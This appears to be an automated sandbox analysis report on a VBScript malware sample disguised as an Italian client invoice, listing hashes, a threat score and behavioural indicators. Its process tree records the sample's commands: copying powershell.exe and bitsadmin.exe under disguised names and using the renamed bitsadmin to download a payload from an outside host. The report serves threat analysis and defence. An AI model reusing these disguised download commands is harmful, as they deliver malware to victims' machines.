Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 07:26
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_01557430269.vbs
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Fatt_cliente_01557430269.vbs
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
Fatt_cliente_01557430269.vbs
-
Size
4KB
-
MD5
5b96f2ae8a3683b45b13cabbf3a134ee
-
SHA1
57d4d4b4a328628471949a3d434b5993ce6430ba
-
SHA256
a0291ef7ae4a775b1ac0a6cf14f58dba8ea3703c41cacc73b64f00f46d053766
-
SHA512
f724493f0a1ebdc89ce901e11e30eeb98b82186ae0e748ff2dc80939d2532c6573bdf7e98366b53f568ca8d502a093331779028fe14b5088796f859a4f83e909
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exedescription pid process target process PID 1496 wrote to memory of 1616 1496 WScript.exe cmd.exe PID 1496 wrote to memory of 1616 1496 WScript.exe cmd.exe PID 1496 wrote to memory of 1616 1496 WScript.exe cmd.exe PID 1496 wrote to memory of 324 1496 WScript.exe cmd.exe PID 1496 wrote to memory of 324 1496 WScript.exe cmd.exe PID 1496 wrote to memory of 324 1496 WScript.exe cmd.exe PID 1496 wrote to memory of 732 1496 WScript.exe VWga.exe PID 1496 wrote to memory of 732 1496 WScript.exe VWga.exe PID 1496 wrote to memory of 732 1496 WScript.exe VWga.exe PID 1496 wrote to memory of 732 1496 WScript.exe VWga.exe -
Executes dropped EXE 1 IoCs
Processes:
VWga.exepid process 732 VWga.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_01557430269.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zVWga.exe2⤵PID:1616
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\VWga.exe2⤵PID:324
-
C:\Users\Admin\AppData\Roaming\VWga.exe"C:\Users\Admin\AppData\Roaming\VWga.exe" /transfer mTGVIF /download https://mzgotech.com/temha/01557430269/it.gif C:\Users\Admin\AppData\Roaming\it.gif2⤵
- Executes dropped EXE
PID:732